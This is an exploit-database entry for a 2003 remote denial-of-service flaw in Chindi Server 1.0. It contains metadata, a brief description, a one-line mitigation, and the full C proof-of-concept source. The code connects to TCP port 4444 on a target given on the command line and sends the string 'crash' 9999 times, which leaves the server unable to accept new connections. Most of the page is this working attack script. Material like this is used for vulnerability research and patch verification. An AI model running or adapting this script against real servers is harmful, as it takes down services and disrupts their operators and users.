Chindi server 1.0 Denial of Service

vendor:

Chindi Server

by:

Luca Ercoli

7,5

CVSS

HIGH

Denial of Service

400

CWE

Product Name: Chindi Server

Affected Version From: 1.0

Affected Version To: 1.0

Patch Exists: Yes

Related CWE: N/A

CPE: a:chindi:chindi_server

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2003

Chindi server 1.0 Denial of Service

Chindi server 1.0 is vulnerable to a remote denial of service attack. By sending a specially crafted string to the server, an attacker can cause the server to crash and become unresponsive. After the attack, the server appears to be up, but will not allow new connections.

Mitigation:

Apply the latest security patches and updates to the server.

Source

Exploit-DB raw data:

/***************************************************
* Chindi server 1.0  Denial of Service
* Proof of Concept by Luca Ercoli  luca.ercoli at inwind.it
* After DoS, server appears to be up, but will not allow
* new connections.                                           
****************************************************

#include 
#include 
#include 
#include 
#include 

#define PORT    4444
#define DOS     "crash"


int main(int argc, char *argv[]){

int nOpt,count,sockfd;
struct hostent *he;
struct sockaddr_in server_addr;

char *host;

printf ("\nChindi server 1.0 remote DoS\n\n");

if(argc < 2 ) {
                printf ("Usage: %s -t target\n",argv[0]);
                exit(0);
        }

while((nOpt = getopt(argc, argv, "t")) != -1) {

        switch(nOpt) {
                        case 't':
                        host = optarg;
                        break;
                        default:exit(0);
                }
        }

if ((he = gethostbyname(argv[2])) == NULL)
          {
                  herror("gethostbyname");
                  exit(1);
          }

server_addr.sin_family = AF_INET;
server_addr.sin_port = htons(PORT);
server_addr.sin_addr = *((struct in_addr *) he->h_addr);

sockfd = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);

if (connect (sockfd, (struct sockaddr *) &server_addr,sizeof(struct 
sockaddr)) == -1)
          {
                  perror("Connect");
                  exit(1);
          }

printf("1. Connected\n");
sleep(1);
printf("2. Sending crash string\n");
sleep(1);
printf("3. Verifing server status: ");
sleep(1);

for (count=0; count<9999; count++) send(sockfd,DOS,strlen(DOS),0);

close(sockfd);


// milw0rm.com [2003-04-18]